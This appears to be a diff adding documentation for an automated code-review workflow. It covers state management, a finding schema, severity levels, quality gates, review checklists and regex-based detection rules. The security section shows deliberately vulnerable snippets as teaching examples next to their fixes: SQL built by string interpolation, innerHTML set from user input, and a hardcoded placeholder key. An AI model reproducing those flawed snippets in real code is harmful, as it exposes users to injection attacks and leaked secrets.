// ... do review work ...
} catch (error) {
// Record error
recordError(workDir, 'deep-review', error.message);
// If needed, restore from backup
restoreState(workDir);
}
```
### Check Review Progress
```javascript
const state = getState(workDir);
const nextDim = getNextDimension(state);
if (nextDim) {
console.log(`Next dimension to review: ${nextDim}`);
updateState(workDir, { current_dimension: nextDim });
} else {
console.log('All dimensions reviewed');
}
```
## Integration with Orchestrator
Update the orchestrator to use StateManager:
```javascript
// In orchestrator.md - Replace direct state operations with StateManager calls
// OLD:
const state = JSON.parse(Read(`${workDir}/state.json`));
// NEW:
const state = getState(workDir);
// OLD:
function updateState(updates) {
const state = JSON.parse(Read(`${workDir}/state.json`));
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
return newState;
}
// NEW:
// Import from state-manager.md
// updateState(workDir, updates) - handles atomic write, backup, validation
// Error handling - OLD:
updateState({
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
error_count: (state.error_count || 0) + 1
});
// Error handling - NEW:
recordError(workDir, actionId, error.message);
```
## State History Format
The `state-history.json` file tracks all state changes:
```json
{
"entries": [
{
"timestamp": "2024-01-01T10:00:00.000Z",
"action": "init",
"changes": { "type": "initialize", "status": "pending" }
},
{
"timestamp": "2024-01-01T10:01:00.000Z",
"action": "update",
"changes": {
"status": { "from": "pending", "to": "running" },
"current_action": { "from": null, "to": "action-collect-context" }
}
},
{
"timestamp": "2024-01-01T10:05:00.000Z",
"action": "restore",
"changes": { "source": "/path/state.backup.json" }
}
]
}
```
## Error Recovery Strategies
| Scenario | Strategy | Function |
|----------|----------|----------|
| State file corrupted | Restore from backup | `restoreState(workDir)` |
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
| Multiple errors | Auto-fail after 3 | `recordError()` |
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
| Review interrupted | Resume from saved state | `getState(workDir)` |
## Best Practices
1. **Always use `updateState()`** - Never write directly to state.json
2. **Check validation warnings** - Warnings may indicate data issues
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
4. **Monitor history** - Check state-history.json for debugging
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`


@@ -0,0 +1,174 @@
# State Schema
State structure definition for the Code Review workflow.
## Schema Definition
```typescript
interface ReviewState {
  // === Metadata ===
  status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
  started_at: string;             // ISO timestamp
  updated_at: string;             // ISO timestamp
  completed_at?: string;          // ISO timestamp
  // === Review target ===
  context: {
    target_path: string;          // Target path (file or directory)
    files: string[];              // Files queued for review
    language: string;             // Primary programming language
    framework?: string;           // Framework (if any)
    total_lines: number;          // Total lines of code
    file_count: number;           // Number of files
  };
  // === Scan results ===
  scan_completed: boolean;
  scan_summary: {
    risk_areas: RiskArea[];       // High-risk areas
    complexity_score: number;     // Complexity score
    quick_issues: QuickIssue[];   // Issues found during quick scan
  };
  // === Review progress ===
  reviewed_dimensions: string[];  // Completed review dimensions
  current_dimension?: string;     // Dimension currently under review
  // === Findings ===
  findings: {
    correctness: Finding[];
    readability: Finding[];
    performance: Finding[];
    security: Finding[];
    testing: Finding[];
    architecture: Finding[];
  };
  // === Report status ===
  report_generated: boolean;
  report_path?: string;
  // === Execution tracking ===
  current_action?: string;
  completed_actions: string[];
  errors: ExecutionError[];
  error_count: number;
  // === Statistics ===
  summary?: {
    total_issues: number;
    critical: number;
    high: number;
    medium: number;
    low: number;
    info: number;
    review_duration_ms: number;
  };
}
interface RiskArea {
  file: string;
  reason: string;
  priority: 'high' | 'medium' | 'low';
}
interface QuickIssue {
  type: string;
  file: string;
  line?: number;
  message: string;
}
interface Finding {
  id: string;                     // Unique identifier, e.g. "CORR-001"
  severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
  dimension: string;              // Owning dimension
  category: string;               // Issue category
  file: string;                   // File path
  line?: number;                  // Line number
  column?: number;                // Column number
  code_snippet?: string;          // Offending code snippet
  description: string;            // Issue description
  recommendation: string;         // Fix recommendation
  fix_example?: string;           // Example fix code
  references?: string[];          // Reference links
}
interface ExecutionError {
  action: string;
  message: string;
  timestamp: string;
}
```
## Initial State
```json
{
"status": "pending",
"started_at": "2024-01-01T00:00:00.000Z",
"updated_at": "2024-01-01T00:00:00.000Z",
"context": null,
"scan_completed": false,
"scan_summary": null,
"reviewed_dimensions": [],
"current_dimension": null,
"findings": {
"correctness": [],
"readability": [],
"performance": [],
"security": [],
"testing": [],
"architecture": []
},
"report_generated": false,
"report_path": null,
"current_action": null,
"completed_actions": [],
"errors": [],
"error_count": 0,
"summary": null
}
```
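A factory that produces the initial state above with fresh timestamps might look like this sketch (the function name is illustrative):

```javascript
// Sketch: build the documented initial state with current timestamps.
function createInitialState(now = new Date()) {
  const ts = now.toISOString();
  return {
    status: 'pending',
    started_at: ts,
    updated_at: ts,
    context: null,
    scan_completed: false,
    scan_summary: null,
    reviewed_dimensions: [],
    current_dimension: null,
    findings: {
      correctness: [], readability: [], performance: [],
      security: [], testing: [], architecture: []
    },
    report_generated: false,
    report_path: null,
    current_action: null,
    completed_actions: [],
    errors: [],
    error_count: 0,
    summary: null
  };
}
```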
## State Transitions
```mermaid
stateDiagram-v2
[*] --> pending: Initialize
pending --> running: collect-context
running --> running: quick-scan
running --> running: deep-review (6x)
running --> running: generate-report
running --> completed: complete
running --> failed: error_count >= 3
running --> user_exit: User abort
completed --> [*]
failed --> [*]
user_exit --> [*]
```
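The diagram above implies a small transition table; a sketch of a guard (table and function name are illustrative, not documented API):

```javascript
// Sketch: allowed transitions derived from the state diagram above.
// 'running' loops on itself through quick-scan, deep-review, and
// generate-report before terminating.
const TRANSITIONS = {
  pending: ['running'],
  running: ['running', 'completed', 'failed', 'user_exit'],
  completed: [],
  failed: [],
  user_exit: []
};

function canTransition(from, to) {
  return (TRANSITIONS[from] || []).includes(to);
}
```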
## Dimension Review Order
1. **correctness** - functional correctness (highest priority)
2. **security** - security (critical)
3. **performance** - performance
4. **readability** - readability
5. **testing** - test coverage
6. **architecture** - architectural consistency
## Finding ID Format
```
{DIMENSION_PREFIX}-{SEQUENCE}
Prefixes:
- CORR: Correctness
- READ: Readability
- PERF: Performance
- SEC: Security
- TEST: Testing
- ARCH: Architecture
Example: SEC-003 = Security issue #3
```
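A sketch of an ID generator matching this format (names are illustrative; the zero-padded three-digit sequence follows the SEC-003 example):

```javascript
// Sketch: map dimensions to their documented prefixes and
// emit IDs in the {DIMENSION_PREFIX}-{SEQUENCE} format.
const DIMENSION_PREFIXES = {
  correctness: 'CORR',
  readability: 'READ',
  performance: 'PERF',
  security: 'SEC',
  testing: 'TEST',
  architecture: 'ARCH'
};

function makeFindingId(dimension, sequence) {
  const prefix = DIMENSION_PREFIXES[dimension];
  if (!prefix) throw new Error(`Unknown dimension: ${dimension}`);
  return `${prefix}-${String(sequence).padStart(3, '0')}`;
}
```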


@@ -0,0 +1,228 @@
# Issue Classification
Issue classification and severity standards.
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-deep-review | Determine issue severity | Severity Levels |
| action-generate-report | Present issues by category | Category Mapping |
---
## Severity Levels
### Critical 🔴
**Definition**: Blocking issues that must be fixed before merge
**Criteria**:
- Exploitable security vulnerability
- Risk of data corruption or loss
- Risk of system crash
- Major production incident
**Examples**:
- SQL/XSS/command injection
- Leaked hardcoded secrets
- Uncaught exception causing a crash
- Database transactions not handled correctly
**Response**: Must be fixed immediately; blocks merge
---
### High 🟠
**Definition**: Important issues that should be fixed before merge
**Criteria**:
- Functional defects
- Important boundary conditions unhandled
- Severe performance regression
- Resource leaks
**Examples**:
- Errors in core business logic
- Memory leaks
- N+1 query problems
- Missing required error handling
**Response**: Strongly recommended to fix
---
### Medium 🟡
**Definition**: Code quality issues that are recommended to fix
**Criteria**:
- Maintainability problems
- Minor performance issues
- Insufficient test coverage
- Deviations from team conventions
**Examples**:
- Overly long functions
- Unclear naming
- Missing comments
- Code duplication
**Response**: Recommended to fix in a follow-up iteration
---
### Low 🔵
**Definition**: Optional improvements
**Criteria**:
- Style issues
- Micro-optimizations
- Readability improvements
**Examples**:
- Variable declaration order
- Extra blank lines
- Code that could be written more concisely
**Response**: Handle according to team preference
---
### Info ⚪
**Definition**: Informational suggestions, not defects
**Criteria**:
- Learning opportunities
- Alternative approach suggestions
- Documentation improvement suggestions
**Examples**:
- "Consider using the newer API here"
- "Consider adding JSDoc comments"
- "The xxx pattern may be worth a look"
**Response**: For reference only
---
## Category Mapping
### By Dimension
| Dimension | Common Categories |
|-----------|-------------------|
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
### Category Details
#### Correctness Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `null-check` | Missing null check | High |
| `boundary` | Unhandled boundary condition | High |
| `error-handling` | Improper error handling | High |
| `type-safety` | Type-safety issue | Medium |
| `logic-error` | Logic error | Critical/High |
| `resource-leak` | Resource leak | High |
#### Security Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `injection` | Injection risk (SQL/command) | Critical |
| `xss` | Cross-site scripting risk | Critical |
| `hardcoded-secret` | Hardcoded secret | Critical |
| `auth` | Authentication/authorization issue | High |
| `sensitive-data` | Sensitive data exposure | High |
| `insecure-dependency` | Insecure dependency | Medium |
#### Performance Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `complexity` | High algorithmic complexity | Medium |
| `n+1-query` | N+1 query problem | High |
| `memory-leak` | Memory leak | High |
| `blocking-io` | Blocking I/O | Medium |
| `inefficient-algorithm` | Inefficient algorithm | Medium |
| `missing-cache` | Missing cache | Low |
#### Readability Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `naming` | Naming issue | Medium |
| `function-length` | Overly long function | Medium |
| `nesting-depth` | Excessive nesting | Medium |
| `comments` | Comment issue | Low |
| `duplication` | Code duplication | Medium |
| `magic-number` | Magic number | Low |
#### Testing Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `coverage` | Insufficient test coverage | Medium |
| `boundary-test` | Missing boundary tests | Medium |
| `mock-abuse` | Overuse of mocks | Low |
| `test-isolation` | Tests not isolated | Medium |
| `flaky-test` | Flaky test | High |
#### Architecture Categories
| Category | Description | Default Severity |
|----------|-------------|------------------|
| `layer-violation` | Layering violation | Medium |
| `circular-dependency` | Circular dependency | High |
| `coupling` | Excessive coupling | Medium |
| `srp-violation` | Single-responsibility violation | Medium |
| `god-class` | God class | High |
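As a sketch, the default severities above can be encoded as a lookup table (only a subset of categories is shown; for ranges like Critical/High, the higher level is assumed here):

```javascript
// Sketch: (dimension, category) -> default severity, per the tables above.
const DEFAULT_SEVERITY = {
  correctness: { 'null-check': 'high', 'logic-error': 'critical', 'type-safety': 'medium' },
  security: { injection: 'critical', auth: 'high', 'insecure-dependency': 'medium' },
  performance: { 'n+1-query': 'high', 'missing-cache': 'low' }
};

function defaultSeverity(dimension, category, fallback = 'medium') {
  // Fall back to a middle-of-the-road severity for unknown pairs
  return DEFAULT_SEVERITY[dimension]?.[category] ?? fallback;
}
```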
---
## Finding ID Format
```
{PREFIX}-{NNN}
Prefixes by Dimension:
- CORR: Correctness
- SEC: Security
- PERF: Performance
- READ: Readability
- TEST: Testing
- ARCH: Architecture
Examples:
- SEC-001: First security finding
- CORR-015: 15th correctness finding
```
---
## Quality Gates
| Gate | Condition | Action |
|------|-----------|--------|
| **Block** | Critical > 0 | Merge forbidden |
| **Warn** | High > 0 | Approval required |
| **Pass** | Critical = 0, High = 0 | Merge allowed |
### Recommended Thresholds
| Metric | Ideal | Acceptable | Needs Work |
|--------|-------|------------|------------|
| Critical | 0 | 0 | Any > 0 |
| High | 0 | ≤ 2 | > 2 |
| Medium | ≤ 5 | ≤ 10 | > 10 |
| Total | ≤ 10 | ≤ 20 | > 20 |
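The gate table above reduces to a small function; a sketch (the function name is illustrative):

```javascript
// Sketch: evaluate the quality gate from a severity tally,
// following the Block / Warn / Pass table above.
function evaluateGate({ critical = 0, high = 0 }) {
  if (critical > 0) return 'block';
  if (high > 0) return 'warn';
  return 'pass';
}
```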


@@ -0,0 +1,214 @@
# Quality Standards
Code review quality standards.
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-generate-report | Quality assessment | Quality Dimensions |
| action-complete | Final scoring | Quality Gates |
---
## Quality Dimensions
### 1. Completeness - 25%
**Measures how completely the review covers the target**
| Score | Criteria |
|-------|----------|
| 100% | All dimensions reviewed; all high-risk files checked |
| 80% | Core dimensions completed; main files checked |
| 60% | Only some dimensions completed |
| < 60% | Review incomplete |
**Checkpoints**:
- [ ] All 6 dimensions reviewed
- [ ] High-risk areas checked in depth
- [ ] Key files covered
---
### 2. Accuracy - 25%
**Measures how accurate the reported findings are**
| Score | Criteria |
|-------|----------|
| 100% | Precise locations, correct classification, no false positives |
| 80% | Occasional classification drift; locations accurate |
| 60% | Some false positives or missed issues |
| < 60% | Poor accuracy |
**Checkpoints**:
- [ ] Line numbers accurate
- [ ] Severity levels reasonable
- [ ] Classification correct
---
### 3. Actionability - 25%
**Measures how practical the recommendations are**
| Score | Criteria |
|-------|----------|
| 100% | Every finding has a concrete, executable fix recommendation |
| 80% | Most findings have clear recommendations |
| 60% | Recommendations are fairly generic |
| < 60% | Recommendations not actionable |
**Checkpoints**:
- [ ] Concrete fix recommendations provided
- [ ] Code examples included
- [ ] Fix priority stated
---
### 4. Consistency - 25%
**Measures how consistently review standards are applied**
| Score | Criteria |
|-------|----------|
| 100% | Identical issues handled identically; uniform standards |
| 80% | Mostly consistent, with occasional deviations |
| 60% | Standards somewhat inconsistent |
| < 60% | Standards chaotic |
**Checkpoints**:
- [ ] ID format uniform
- [ ] Severity criteria consistent
- [ ] Description style uniform
---
## Quality Gates
### Review Quality Gate
| Gate | Overall Score | Action |
|------|---------------|--------|
| **Excellent** | ≥ 90% | High-quality review |
| **Good** | ≥ 80% | Satisfactory review |
| **Acceptable** | ≥ 70% | Minimally acceptable |
| **Needs Improvement** | < 70% | Needs improvement |
### Code Quality Gate (Based on Findings)
| Gate | Condition | Recommendation |
|------|-----------|----------------|
| **Block** | Critical > 0 | Merge forbidden; must fix |
| **Warn** | High > 3 | Needs team discussion |
| **Caution** | Medium > 10 | Improvement recommended |
| **Pass** | Otherwise | OK to merge |
---
## Report Quality Checklist
### Structure
- [ ] Includes review overview
- [ ] Includes issue statistics
- [ ] Includes high-risk areas
- [ ] Includes issue details
- [ ] Includes fix recommendations
### Content
- [ ] Issue descriptions clear
- [ ] File locations accurate
- [ ] Code snippets valid
- [ ] Fix recommendations concrete
- [ ] Priorities explicit
### Format
- [ ] Markdown well-formed
- [ ] Tables aligned
- [ ] Code-block syntax correct
- [ ] Links valid
- [ ] No spelling errors
---
## Validation Function
```javascript
function validateReviewQuality(state) {
  const scores = {
    completeness: 0,
    accuracy: 0,
    actionability: 0,
    consistency: 0
  };
  // 1. Completeness
  const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
  scores.completeness = (dimensionsReviewed / 6) * 100;
  // 2. Accuracy (needs human validation or later feedback;
  //    estimated for now from the absence of execution errors)
  scores.accuracy = state.error_count === 0 ? 100 : Math.max(0, 100 - state.error_count * 20);
  // 3. Actionability
  const findings = Object.values(state.findings).flat();
  const withRecommendations = findings.filter(f => f.recommendation).length;
  scores.actionability = findings.length > 0
    ? (withRecommendations / findings.length) * 100
    : 100;
  // 4. Consistency (check ID format, etc.)
  const validIds = findings.filter(f => /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/.test(f.id)).length;
  scores.consistency = findings.length > 0
    ? (validIds / findings.length) * 100
    : 100;
  // Overall
  const overall = (
    scores.completeness * 0.25 +
    scores.accuracy * 0.25 +
    scores.actionability * 0.25 +
    scores.consistency * 0.25
  );
  return {
    scores,
    overall,
    gate: overall >= 90 ? 'excellent' :
          overall >= 80 ? 'good' :
          overall >= 70 ? 'acceptable' : 'needs_improvement'
  };
}
```
---
## Improvement Recommendations
### If Completeness is Low
- Widen the range of files scanned
- Ensure every dimension is reviewed
- Focus on high-risk areas
### If Accuracy is Low
- Improve rule precision
- Reduce false positives
- Verify line-number accuracy
### If Actionability is Low
- Add a fix recommendation to every finding
- Provide code examples
- Spell out fix steps
### If Consistency is Low
- Unify the ID format
- Standardize severity judgments
- Use templated descriptions


@@ -0,0 +1,337 @@
# Review Dimensions
Review dimension definitions and checkpoint specifications.
## When to Use
| Phase | Usage | Section |
|-------|-------|---------|
| action-deep-review | Fetch dimension check rules | All |
| action-generate-report | Dimension name mapping | Dimension Names |
---
## Dimension Overview
| Dimension | Weight | Focus | Key Indicators |
|-----------|--------|-------|----------------|
| **Correctness** | 25% | Functional correctness | Boundary conditions, error handling, type safety |
| **Security** | 25% | Security risks | Injection attacks, sensitive data, permissions |
| **Performance** | 15% | Execution efficiency | Algorithmic complexity, resource usage |
| **Readability** | 15% | Maintainability | Naming, structure, comments |
| **Testing** | 10% | Test quality | Coverage, boundary tests |
| **Architecture** | 10% | Architectural consistency | Layering, dependencies, patterns |
---
## 1. Correctness
### Checklist
- [ ] **Boundary condition handling**
  - Empty arrays / empty strings
  - Null / undefined
  - Numeric boundaries (0, negatives, MAX_INT)
  - Collection boundaries (first element, last element)
- [ ] **Error handling**
  - Try-catch coverage
  - Errors are not silently swallowed
  - Error messages are meaningful
  - Resources are released correctly
- [ ] **Type safety**
  - Type conversions are correct
  - Implicit conversions avoided
  - TypeScript strict mode
- [ ] **Logical completeness**
  - If-else branches complete
  - Switch has a default
  - Loop termination conditions correct
### Common Problem Patterns
```javascript
// ❌ Problem: missing null check
function getName(user) {
  return user.name.toUpperCase(); // user may be null
}
// ✅ Fix
function getName(user) {
  return user?.name?.toUpperCase() ?? 'Unknown';
}
// ❌ Problem: empty catch block
try {
  await fetchData();
} catch (e) {} // error silently swallowed
// ✅ Fix
try {
  await fetchData();
} catch (e) {
  console.error('Failed to fetch data:', e);
  throw e;
}
```
---
## 2. Security
### Checklist
- [ ] **Injection protection**
  - SQL injection (use parameterized queries)
  - XSS (avoid innerHTML)
  - Command injection (avoid exec)
  - Path traversal
- [ ] **Authentication and authorization**
  - Permission checks complete
  - Token validation
  - Session management
- [ ] **Sensitive data**
  - No hardcoded secrets
  - Logs contain no sensitive information
  - Encryption in transit
- [ ] **Dependency security**
  - No dependencies with known vulnerabilities
  - Versions pinned
### Common Problem Patterns
```javascript
// ❌ Problem: SQL injection risk
const query = `SELECT * FROM users WHERE id = ${userId}`;
// ✅ Fix: parameterized query
const query = `SELECT * FROM users WHERE id = ?`;
db.query(query, [userId]);
// ❌ Problem: XSS risk
element.innerHTML = userInput;
// ✅ Fix
element.textContent = userInput;
// ❌ Problem: hardcoded secret
const apiKey = 'sk-xxxxxxxxxxxx';
// ✅ Fix
const apiKey = process.env.API_KEY;
```
---
## 3. Performance
### Checklist
- [ ] **Algorithmic complexity**
  - Avoid O(n²) on large datasets
  - Use appropriate data structures
  - Avoid unnecessary loops
- [ ] **I/O efficiency**
  - Batch operations vs. one query per iteration
  - Avoid N+1 queries
  - Cache where appropriate
- [ ] **Resource usage**
  - Memory leaks
  - Connection pool usage
  - Stream large files
- [ ] **Async handling**
  - Parallel vs. serial
  - Proper use of Promise.all
  - Avoid blocking
### Common Problem Patterns
```javascript
// ❌ Problem: N+1 queries
for (const user of users) {
  const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
}
// ✅ Fix: batch query
const userIds = users.map(u => u.id);
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
// ❌ Problem: serial execution of parallelizable operations
const a = await fetchA();
const b = await fetchB();
const c = await fetchC();
// ✅ Fix: run in parallel
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
```
---
## 4. Readability
### Checklist
- [ ] **Naming conventions**
  - Variable names self-explanatory
  - Function names express actions
  - Constants in UPPER_CASE
  - Avoid abbreviations and single letters
- [ ] **Function design**
  - Single responsibility
  - Length < 50 lines
  - Fewer than 5 parameters
  - Nesting < 4 levels
- [ ] **Code organization**
  - Logical grouping
  - Blank lines as separators
  - Import ordering
- [ ] **Comment quality**
  - Explain WHY, not WHAT
  - Kept up to date
  - No redundant comments
### Common Problem Patterns
```javascript
// ❌ Problem: unclear naming
const d = new Date();
const a = users.filter(x => x.s === 'active');
// ✅ Fix
const currentDate = new Date();
const activeUsers = users.filter(user => user.status === 'active');
// ❌ Problem: function too long, too many responsibilities
function processOrder(order) {
  // ... 200 lines covering validation, calculation, persistence, notification
}
// ✅ Fix: split responsibilities
function validateOrder(order) { /* ... */ }
function calculateTotal(order) { /* ... */ }
function saveOrder(order) { /* ... */ }
function notifyCustomer(order) { /* ... */ }
```
---
## 5. Testing
### Checklist
- [ ] **Test coverage**
  - Core logic tested
  - Boundary conditions tested
  - Error paths tested
- [ ] **Test quality**
  - Tests independent
  - Assertions explicit
  - Mocks used in moderation
- [ ] **Test maintainability**
  - Clear naming
  - Uniform structure
  - No duplication
### Common Problem Patterns
```javascript
// ❌ Problem: tests not independent
let counter = 0;
test('increment', () => {
  counter++; // depends on external state
  expect(counter).toBe(1);
});
// ✅ Fix: each test self-contained
test('increment', () => {
  const counter = new Counter();
  counter.increment();
  expect(counter.value).toBe(1);
});
// ❌ Problem: missing boundary test
test('divide', () => {
  expect(divide(10, 2)).toBe(5);
});
// ✅ Fix: include boundary cases
test('divide by zero throws', () => {
  expect(() => divide(10, 0)).toThrow();
});
```
---
## 6. Architecture
### Checklist
- [ ] **Layering**
  - Layers clearly separated
  - Dependencies point in the right direction
  - No circular dependencies
- [ ] **Modularity**
  - High cohesion, low coupling
  - Interfaces clearly defined
  - Single responsibility
- [ ] **Design patterns**
  - Appropriate pattern usage
  - No over-engineering
  - Follow the project's existing patterns
### Common Problem Patterns
```javascript
// ❌ Problem: muddled layering (controller talks to the database directly)
class UserController {
  async getUser(req, res) {
    const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
    res.json(user);
  }
}
// ✅ Fix: clean layering
class UserController {
  constructor(private userService: UserService) {}
  async getUser(req, res) {
    const user = await this.userService.findById(req.params.id);
    res.json(user);
  }
}
// ❌ Problem: circular dependency
// moduleA.ts
import { funcB } from './moduleB';
// moduleB.ts
import { funcA } from './moduleA';
// ✅ Fix: extract a shared module or use dependency injection
```
---
## Severity Mapping
| Severity | Criteria |
|----------|----------|
| **Critical** | Security vulnerabilities, data corruption risk, crash risk |
| **High** | Functional defects, severe performance problems, important boundaries unhandled |
| **Medium** | Code quality and maintainability issues |
| **Low** | Style issues, optimization suggestions |
| **Info** | Informational suggestions, learning opportunities |


@@ -0,0 +1,63 @@
{
"dimension": "architecture",
"prefix": "ARCH",
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
"rules": [
{
"id": "circular-dependency",
"category": "dependency",
"severity": "high",
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
"patternType": "regex",
"contextPattern": "export.*import.*from.*same-module",
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
},
{
"id": "god-class",
"category": "single-responsibility",
"severity": "high",
"pattern": "class\\s+\\w+\\s*\\{",
"patternType": "regex",
"methodThreshold": 15,
"lineThreshold": 300,
"description": "Class with too many methods or lines violates single responsibility principle",
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
},
{
"id": "layer-violation",
"category": "layering",
"severity": "high",
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
"patternType": "regex",
"contextPath": ["controller", "handler", "route", "component"],
"description": "Direct database access from presentation layer violates layered architecture",
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
},
{
"id": "missing-interface",
"category": "abstraction",
"severity": "medium",
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
"patternType": "regex",
"negativePatterns": ["interface", "implements", "inject"],
"description": "Direct instantiation of services/repositories creates tight coupling",
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
},
{
"id": "mixed-concerns",
"category": "separation-of-concerns",
"severity": "medium",
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
"patternType": "regex",
"contextPath": ["component", "view", "page"],
"description": "Network calls in UI components mix data fetching with presentation",
"recommendation": "Extract data fetching to hooks, services, or state management layer",
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
}
]
}


@@ -0,0 +1,60 @@
{
"dimension": "correctness",
"prefix": "CORR",
"description": "Rules for detecting logical errors, null handling, and error handling issues",
"rules": [
{
"id": "null-check",
"category": "null-check",
"severity": "high",
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
"patternType": "regex",
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
"description": "Property access without null/undefined check may cause runtime errors",
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
},
{
"id": "empty-catch",
"category": "empty-catch",
"severity": "high",
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
"patternType": "regex",
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
},
{
"id": "unreachable-code",
"category": "unreachable-code",
"severity": "medium",
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
"patternType": "regex",
"description": "Code after return statement is unreachable and will never execute",
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
},
{
"id": "array-index-unchecked",
"category": "boundary-check",
"severity": "high",
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
"patternType": "regex",
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
"recommendation": "Check array length or use optional chaining before accessing array elements",
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
},
{
"id": "comparison-type-coercion",
"category": "type-safety",
"severity": "medium",
"pattern": "[^!=]==[^=]|[^!]==[^=]",
"patternType": "regex",
"negativePatterns": ["===", "!=="],
"description": "Using == instead of === can lead to unexpected type coercion",
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
}
]
}


@@ -0,0 +1,140 @@
# Code Review Rules Index
This directory contains externalized review rules for the multi-dimensional code review skill.
## Directory Structure
```
rules/
├── index.md # This file
├── correctness-rules.json # CORR - Logic and error handling
├── security-rules.json # SEC - Security vulnerabilities
├── performance-rules.json # PERF - Performance issues
├── readability-rules.json # READ - Code clarity
├── testing-rules.json # TEST - Test quality
└── architecture-rules.json # ARCH - Design patterns
```
## Rule File Schema
Each rule file follows this JSON schema:
```json
{
"dimension": "string", // Dimension identifier
"prefix": "string", // Finding ID prefix (4 chars)
"description": "string", // Dimension description
"rules": [
{
"id": "string", // Unique rule identifier
"category": "string", // Rule category within dimension
"severity": "critical|high|medium|low",
"pattern": "string", // Detection pattern
"patternType": "regex|includes|ast",
"negativePatterns": [], // Patterns that exclude matches
"caseInsensitive": false, // For regex patterns
"contextPattern": "", // Additional context requirement
"contextPath": [], // Path patterns for context
"lineThreshold": 0, // For size-based rules
"methodThreshold": 0, // For complexity rules
"description": "string", // Issue description
"recommendation": "string", // How to fix
"fixExample": "string" // Code example
}
]
}
```
